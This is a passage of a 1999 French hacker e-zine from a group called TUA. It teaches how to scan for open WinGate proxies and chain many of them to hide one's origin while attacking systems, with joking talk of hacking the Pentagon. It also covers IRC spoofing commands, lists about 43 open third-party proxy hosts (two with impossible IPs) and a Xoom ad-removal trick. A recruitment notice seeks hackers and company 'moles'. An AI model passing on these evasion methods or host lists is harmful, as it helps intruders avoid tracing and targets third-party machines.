Provider) de cette personne reprenne le même format pour ses usagers. Par exemple si l'IP dynamique est 212.23.158.169, alors scannez les IP du style 212.23.158.x. Vous trouverez normalement une liste d'IP, et vous avez de bonnes chances pour trouver des WinGates dans le tas. Note : les IP des WinGates ont généralement un dernier chiffre élevé, il y a donc plus de chances pour que 212.23.158.189 soit un WinGate que 212.23.158.2. Maintenant vous savez en gros comment chercher des WinGates, maintenant que vous en avez vous voulez les utiliser pas vrai ? Comme leur nom l'indique, vous allez les utiliser tel un portail jusqu'à votre destination finale. Ex : telnettez votre WinGate sur le port 23, et tapez ce qui suit à l'invite : WinGate> serveur.com 23 Ainsi vous vous conecterez sur serveur.com sur le port 23, mais entre le serveur et vous il y aura le WinGate. Le serveur envoie les infos que vous demandez au WinGate, qui vous les transmet. Dans ses logs le serveur verra donc le WinGate comme user, avec son IP etc... et pas le vôtre ! Maintenant vous voulez hacker le Pentagone... chouette, on se connecte sur notre WinGate favori, on se connecte sur le Pentagone, maintenant vous trouvez le flaw et vous changez le cours du dollar et envoyez des bombes atomiques sur les russes... le lendemain à 3 heures du mat' les SWAT débarquent dans votre chambre et tirant partout avec leurs MP-5 et en vous arrêtant pour conspiration, et vous êtes condamné à 6658 ans de peine de prison (mais en secret ils vous libèrent et emprisonnent un claudo à votre place et après vous bossez pour eux et vous vous faites gavé de tunes). En gros voici le schéma, mais vous remarquez que quelque chose a cloché quelque part. Ben oui vous vous êtes faits arrêter, c'est pas ce qu'il y a de mieux tout de même. Revoyons l'action au ralenti, lorsque les meilleurs spécialistes en informatique de la planète se sont mis à vous traquer : ils ont remarqué que vous vous étiez connecté sur eux quelques secondes seulement après que ce se soit fait et ils ont déjà commencé à vous tracer.... avant même que vous ayez eu le temps de faire la plus petite commande ils savent que vous êtes passé par un WinGate, avec son IP. Ils le contactent expressément sur le champ tout de suite et ils réquisitionnent ses logs, et là ils voient votre IP en clair parce que vous êtes connecté sur lui en ce moment même. Là ils contactent votre ISP, qui est bien obligé de leur dire qu'ils ont effectivement quelqu'un chez eux dont l'IP est 195.156.12.48, il leur balancent votre nom, adresse numéro de phone... et voilà comment se faire choper connement alors qu'on se croyait à l'abri... Mais vous êtes en train de vous dire "Ouin, je veux hacker le pentagone sans me faire choper moi !!!". Certes, et je suis là pour vous dire comment faire héhéhé... Je vous présente maintenant la bounce technique... Comme vous êtes très fort vous avez toute une liste de WinGates prêts à être utilisés, et vous êtes hypers chauds pour hacker le pentagone. C'est parti. Connectez vous sur un WinGate comme d'habitude : WinGate> wingate2.net 23 Quoi ? on est sur un WinGate et on se connecte sur un autre à partir de là ??? WinGate> wingate3.com 23 Mais ??? WinGate> wingate4.com 23 .... Je crois que vous avez compris là c'est bon. La technique est de se connecter sur un WinGate, puis à partir de là sur un deuxième, et encore sur un autre, puis sur un autre, et ainsi de suite... Maintenant si on vous trace on trouvera l'IP du dernier WinGate. Puis si on arrive à vous tracer plus loin (je suis pas sûr d'y arriver mais là je fais confiance au pentagone pour ça ! :o) ), on trouvera l'IP du deuxième WinGate etc... Autrement dit si vous êtes passé par 10 WinGates on mettra énormément de temps à vous tracer, d'autant plus que certains ne loggent pas leur activité ou l'effacent au bout de deux ou trois jours... Si vous bouncez 10 WinGates vous êtes le roi de la montagne, le fantôme du net, samouraï silencieux, le loup qui se faufile entre les mailles tissées par vos poursuivants.... De plus c'est pas moi qui le dit c'est les gars de Rhino9, à mon avis le plus grand groupe de hackers de tous les temps. Personnellement comme je suis de nature prudente et que j'aime pas que le SWAT débarque chez moi comme ça, je pense que je passerai plutôt par au moins 20 WinGates, au moins là je pense que vous serez tranquille !!!! ;^) Une autre utilité des WinGates est l'IRC Spoofing. Pour cela (technique pour windows) lancez votre client IRC (mIRC on va dire) et tapez les commandes suivantes : /server wingate.com Le client se connecte sur le WinGate. /quote irc.irc.net 6667 Vous vous connectez sur le serveur spécifié, port 6667 /quote user nq nq nq@serveur.com nq /quote nick nq Ces deux dernières lignes envoient vos infos, ou nq signifie "n'importe quoi", c'est à dire que vous marquez ce que vous voulez je pense. Enfin là je m'avance pas trop j'aime pas IRC j'y vais pas. Si cela ne marche pas c'est probablement que le serveur IRC ne vous permet pas de passer par un WinGate, vous ne pourrez pas vous connecter sur le serveur. Pour ceux qui veulent une copie du script anti-WinGate mailez-moi. Maintenant en principe vous devriez être un pro des WinGates. Mais comme je suis très gentil, très fort, très intelligent, et... vous avez pas intérêt à me contredire sinon je vous donne pas ce que j'avais prévu !!! Bon... je disais, pour éviter de vous fatiguer voici une liste de WinGates prêts à être utilisés (43 si j'ai bien compté) : proxy.amtvl.com:23 156-21.dr.cgocable.ca:23 bb1.betterbox.net:23 computer.fairnet.com:23 sun-170-233.sunwave.net:23 ns.matsugc.co.jp:23 195.96.97.236:23 noyan-tapan.am:23 itpeople.ozemail.com.au:23 med23502-9.gw.connect.com.au:23 sjc.cyberspace.com.br:23 194.213.242.259:23 194.213.242.1:23 194.213.242.257:23 computer.fairnet.com:23 ria2.rheintal.ch:23 ewwmail.ozemail.com.au:23 mail.alghanim.qualitynet.net:23 syd-56K-041.tpgi.com.au:23 ns.elaso.cz:23 194.213.242.202:23 delirium.swm.uni-mannheim.de:23 uni.eltron.ee:23 mel-56K-147.tpgi.com.au:23 raqhope.ozemail.com.au:23 ewwmail.ozemail.com.au:23 mail.colosio-tabasco.org.mx:23 n1.cal.hamura.tokyo.jp:23 dns.rikcad.co.jp:23 hardwickgw.apex.net.au:23 cbp2.dircon.co.uk:23 ria2.rheintal.ch:23 204.39.96.1:23 mail.colosio-tabasco.org.mx:23 bb1.betterbox.net:23 n1.cal.hamura.tokyo.jp:23 delirium.swm.uni-mannheim.de:23 3dillusion.com:23 dns.rikcad.co.jp:23 adissmtp.ozemail.com.au:23 hardwickgw.apex.net.au:23 wflanin.czcom.cz:23 ewwmail.ozemail.com.au:23 Je viens tout juste d'updater la liste (12 aout 1999), donc profitez en tant qu'ils marchent tous. Le :23 à la fin de chaque serveur signifie qu'il faut s'y connecter sur le port 23, au cas où vous auriez pas compris. Vous remarquerez qu'il y a deux IP se terminant par 1, ce qui contredit ce que j'ai dit tout à l'heure concernant les IP des WinGates, comme quoi il y a des exceptions. J'attire tout particulièrement votre attention sur deux IP qui me semblent très étranges : 194.213.242.259 et 194.213.242.257... vous avez remarqué ? Wut the hell is this ??? Théoriquement pour ceux qui ne le sauraient pas ce genre d'IPs est impossible, les numéros allant de 0 à 255. Si quelqu'un à la moindre idée de ce que cela peut bien être, qu'il me maile sur le champ !!!! Bon ben maintenant je crois que j'ai plus qu'à vous souhaiter un bon spoofing. Et si vous trouvez des WinGates qui ne marchent plus ou des nouveaux (qui marchent eux), toujours pareil, mailez moi qu'on aie une liste à jour. Depuis le temps que je vous dis de me mailer je crois que je devrais vous la donner mon adresse : maddany@multimania.com. ---> bonne chance et allez pas vous faire choper, alors méfiance ! ======================================================================== My name is OMM, X OOM !!! ======================================================================== Vous avez un compte chez Xoom ? Super !!! Espace illimité etc... Seulement, il y a un truc qui vous fais chier..., c'est la barre de pub en haut de votre site... Hé bien moi, le Grand Korben qui possède l'EGO le plus imposant de la planète a trouvé la solution... C'est très simple. Au lieu de taper une adresse du type: http://members.xoom.com/moncompte/ utilisez plutot cette adresse la: http://members.xoom.com/_XOOM/moncompte/ En intercalant le /_XOOM/, pffuit !!! Plus de pub... Merci qui ? Merci Korben... Korben00@Hotmail.com [Nd MadDany : chtite nexplication, c'est parce que la vraie adresse où vos pages sont stockées est http://members.xoom.com/_XOOM/moncompte, et pas celle que l'on vous a donné. En tapant sans le _XOOM vous êtes redirigés vers une version modifiée automatiquement de vos pages, et évidemment ils ont pas pris la peine de nous avertir chez xoom ! :o)] [Nd WA: Ca me parait évident..!!] ===================================================================== ON RECHERCHE POUR NOTRE GROUPE ===================================================================== -Des hackers, plein de hackers sous Windows / Linux ou autre... Vous serez les piliers du groupe. Débutants ou expert, si vous aimez ça, rejoignez-nous. -Des graphistes pour le site. Mes dessins sont un peu miteux les gars... -Des programmeurs pour créer des logiciels qui nous faciliterons la tâche. C'est fatiguant de hacker "à la main" -Un hébergement gratos pour notre site avec accès ftp et http. Ce serai sympa.... -Des "Chasseurs" pour trouver les sites sensibles Alors, pour ceux qui n'ont pas peur, vous devrez vous ballader sur le web pour relever des adresses (pédophile, racistes, ...etc voir la liste.) que nous mettrons dans une Black list. -Des taupes dans des entreprises pour des infos interressantes. Pour être au courant avant tout le monde et taper là ou ça fait mal. -Des traducteurs (Anglais/Russe/Allemand/Japonais/Chinois/Italien....) Pour que nous puissions être compris du mond entier. -Des contacts dans la presse pour exprimer nos idées. Car la presse et notre "amie" et sera notre voie. -Des écrivains pour écrire des articles pour le Zine (Tutorials, histoires, chansons, pensées philosophiques...) On a besoin de vos talents... -Des pros de la sécurité pour nous aider à pas nous faire pincer. Des gars qui pourront foutre des Firewalls partout sur le site et qui pourront nous expliquer comment détourner tel ou tel système. -Des codeurs et programmeurs de Démos pour nous faire un super spot de pub... Là, on est gentils... -Un gars qui pourrait nous filer un BOT pour notre irc Merci et surtout, n'hésitez pas à vous inscrire.... ===================================================================== Rejoignez nous !!! ===================================================================== Remplissez ce questionnaire et envoyez le moi à White_Angel_TUA@Hotmail.com IL FAUT ETRE MOTIVE ET ETRE TRES BON DANS SON DOMAINE !!! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Nom: Prénom: Age: Sexe: E-Mail: Adresse site web: Langue(s) parlée(s): Pays: Surnom que vous voulez prendre au sein du groupe: Ce que vous voulez faire dans le groupe: - - - - - - Vos suggestions: - - - - - - - - - +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Je vous attends nombreux...N'hésitez pas, nous acceptons tout le monde (Jeunes, vieux, homme , femme , débutant , professionnel...MAIS MOTIVE ET QUI VEUT ALLER LOIN !!!) SAUF LES TETES BRULEES!!!! [Nd MadDany : WA oublie toujours de préciser que c'est moi qui traite les inscriptions des femmes. C'est donc à moi qu'il faut envoyer votre inscription si vous disposez d'un héritage génétique féminin évident.] [Nd WA: Non, n'écoutez pas (ne lisez pas ?) ce qu'il dit, car JE gère toutes les inscriptions même celles des Demoiselles... ;-) ] ===================================================================== REMERCIEMENTS ===================================================================== Remerciements de White Angel : -A MadDany, A Korben, A Moi aussi pour les articles du zines... -Tous les hackers qui m'aident dans mon entreprise qui est je l'avoue ambitieuse. -Vous qui me lisez et qui allez vous inscrire et distribuer nos zines. -Et j'en oublie Sinon, j'emmerde tjrs FT. Remerciements de MadDany : -A WA parce qu'il m'a remercié (c'est beau l'amitié...) -A moi, parce que je m'aime [Nd WA: Nous aussi on t'aime..] -A mon ordinateur parce qu'il m'aime aussi. Si c'est possible ! Remerciements de Korben : -WA -MAdDanY -Mes amis (Merci Tchang !!) -Jésus -Mes pôtes du channel #TUA -Et à vous, amis lecteurs que j'aimes... REJOIGNEZ NOUS !!! HTTP://WWW.UNDERGROUNDANGEL.CJB.NET ATTENTION: Message pour les membres du groupe et pour ceux qui seraient susceptible de nous rejoindre.... JE VAIS FAIRE UN GRAND TRI DANS LES MEMBRES... Ca va se résumer en 2 groupes: Ceux qui sont motivés et qui se bougent--->On Garde Et ceux qui ne foutent rien----> On vire ! [Nd MadDany : oué !] Voilà, j'espère que ça vous a plus...A+ ===================================================================== A LA PROCHAINE !!! ===================================================================== ___________ ____ ______/ \__// \__/____\ _/ \_/ : //____\\ /| : : .. / \ | | :: :: \ / | | :| || \ \______/ | | || || |\ / | \| || || | / | \ | || || | / /_\ \ | ___ || ___ || | / / \ \_-_/ \_-_/ | ____ |/__/ \ _\_--_/ \ / /____ / / \ / \______\_________/ BOUGE TOI !!!!!! That's all HTTP://WWW.MULTIMANIA.COM/TUA/ HTTP://UNDERGROUNDANGEL.CJB.NET Sur irc.kewl.org -----> #tua (on recherche un bot !!!) White Angel: White_Angel_TUA@Hotmail.com A+ White Angel